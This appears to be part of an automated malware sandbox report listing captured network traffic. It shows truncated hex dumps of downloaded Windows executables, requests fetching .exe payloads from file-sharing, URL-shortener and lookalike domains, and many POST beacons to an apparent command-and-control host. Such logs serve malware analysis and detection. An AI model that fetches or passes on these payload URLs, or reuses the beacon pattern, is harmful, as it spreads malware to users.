                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:55 GMTContent-Type: application/x-msdos-programContent-Length: 350720Connection: closeLast-Modified: Fri, 31 Dec 2021 18:22:02 GMTETag: "55a00-5d4753f5484a9"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 17 37 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 20 04 00 00 d6 33 00 00 00 00 00 40 56 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 67 a4 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 1d 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 4c 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 1e 04 00 00 10 00 00 00 20 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 69 78 69 00 00 00 05 00 00 00 00 60 37 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 02 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.2Date: Fri, 31 Dec 2021 18:22:59 GMTContent-Type: application/x-msdos-programContent-Length: 645592Connection: closeLast-Modified: Wed, 08 Dec 2021 03:32:46 GMTETag: "9d9d8-5d29a24b21380"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:23:24 GMTContent-Type: application/x-msdos-programContent-Length: 756224Connection: closeLast-Modified: Fri, 31 Dec 2021 18:20:30 GMTETag: "b8a00-5d47539dc6f38"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 df 23 4f a3 9b 42 21 f0 9b 42 21 f0 9b 42 21 f0 08 0c b9 f0 9a 42 21 f0 f4 34 bf f0 8a 42 21 f0 f4 34 8b f0 f4 42 21 f0 92 3a b2 f0 98 42 21 f0 9b 42 20 f0 29 42 21 f0 f4 34 8a f0 ac 42 21 f0 f4 34 bb f0 9a 42 21 f0 f4 34 bc f0 9a 42 21 f0 52 69 63 68 9b 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 dd a4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 4c 0a 00 00 da 33 00 00 00 00 00 b0 82 08 00 00 10 00 00 00 60 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 48 00 00 04 00 00 fb 78 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 4a 0a 00 28 00 00 00 00 a0 3d 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 47 00 48 22 00 00 40 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 4a 0a 00 00 10 00 00 00 4c 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 60 0a 00 00 8c 00 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 61 6a 75 74 00 00 05 00 00 00 00 90 3d 00 00 02 00 00 00 dc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 0a 00 00 a0 3d 00 00 50 00 00 00 de 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ba 5a 00 00 00 f0 47 00 00 5c 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Dec 2021 18:23:26 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Fri, 31 Dec 2021 09:21:26 GMTETag: "181490-5d46db1fb73a3"Accept-Ranges: bytesContent-Length: 1578128Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 82 03 00 00 00 00 00 00 50 3f 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 40 00 00 04 00 00 63 e0 18 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 3d 00 58 01 00 00 00 50 3d 00 1c f6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 61 64 61 74 61 00 00 00 30 3d 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 61 64 61 74 61 00 00 00 10 00 00 00 40 3d 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c f6 01 00 00 50 3d 00 1c f6 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 78 74 00 00 00 00 80 01 00 00 50 3f 00 51 7d 01 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /attachments/916319571638620172/925647741571452938/Pyroxylic.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /3eHgQQR HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
                      Source: global trafficHTTP traffic detected: GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitly.com
                      Source: global trafficHTTP traffic detected: GET /%28/8V4TRR/q.exe%29.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /u8txqc HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: short.link
                      Source: global trafficHTTP traffic detected: GET /dogewallet-setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dodecoin.org
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkkeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://paagmrxgm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxruse.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycrskwoyr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcmwbj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fplnkk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tocckist.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slfbv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awqqms.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erudng.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwkkkbswtf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtxigbrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxkmtikn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://piydputbq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lrbpoemjfa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdctril.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edvbcrjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ghfptm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yntwmx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smhel.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ofikhxrblm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iagotmptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gojbnwwiu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://axvhnmv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjiki.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yajqqfxbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dantqwhs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://meiprwiro.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljbhnxlymc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6976_1640974830_4226.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwwpu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbnixcsxgc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jejnywv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: host-data-coin-11.com
